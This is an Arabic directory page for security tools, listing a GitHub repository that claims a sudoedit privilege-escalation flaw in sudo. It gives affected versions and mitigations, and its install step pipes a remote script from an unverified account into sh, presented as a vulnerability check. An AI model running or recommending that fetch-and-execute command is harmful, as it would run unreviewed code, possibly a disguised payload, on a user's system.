Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-31969 — CVE-2024-31969 هو تصعيد امتيازات محلي في sudo عند استخدام sudoedit. | Kitploit
أدوات/GitHubGitHub/kingfakee7/cve-2024-31969
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليم
GitHubkingfakee7/cve-2024-31969

CVE-2024-31969

CVE-2024-31969 هو تصعيد امتيازات محلي في sudo عند استخدام sudoedit.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

📌 CVE-2024-31969

CVE-2024-31969 هو ثغرة رفع امتيازات محلية في sudo عند استخدام الأمر sudoedit.

هذه الثغرة تم تقديمها منذ sudo 1.9.0 بسبب طريقة تحقق sudoedit من متغيرات البيئة للمستخدم وملكية الملفات بشكل غير صحيح.


📖 الوصف

عيب تم تقديمه في sudo 1.9.0 في كيفية تحقق sudoedit من متغيرات البيئة للمستخدمين وملكية الملفات.

هذه الثغرة تسمح لمستخدم محلي لديه صلاحية الوصول إلى sudoedit بتعديل ملفات عشوائية كجذر من خلال التلاعب بمتغيرات البيئة مثل SUDO_EDITOR، أو عن طريق استغلال الروابط الرمزية.


📊 إصدارات Sudo المتأثرة:

إصدار Sudoالحالة
1.9.0 → 1.9.15p4🔥 ضعيف
1.9.15p5 فما فوق✅ آمن
1.8.x (بما في ذلك 1.8.23)❌ غير متأثر

📦 طريقة التثبيت والاستخدام

قم بتشغيل الأمر التالي:

root@kitploit:~
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh

🛠️ الحلول / التخفيف

  • قم بتحديث sudo إلى الإصدار 1.9.15p5 أو أحدث.
  • قم بتقييد قواعد sudoers التي تسمح بـ sudoedit للمستخدمين غير الجذر.
  • استخدم تكوين env_keep أو env_reset الآمن في ملف /etc/sudoers.

📚 المراجع

  • CVE-2024-31969 في NVD

⚠️ إخلاء مسؤولية

تم إنشاء هذا المستودع لأغراض تعليمية و توثيق أمن النظام.
يُحظر بشدة استخدام هذه المعلومات لأنشطة غير قانونية أو بدون إذن كتابي من مالك النظام.
أي شكل من أشكال سوء الاستخدام يقع بالكامل خارج مسؤولية المنشئ.

تنزيل الأداة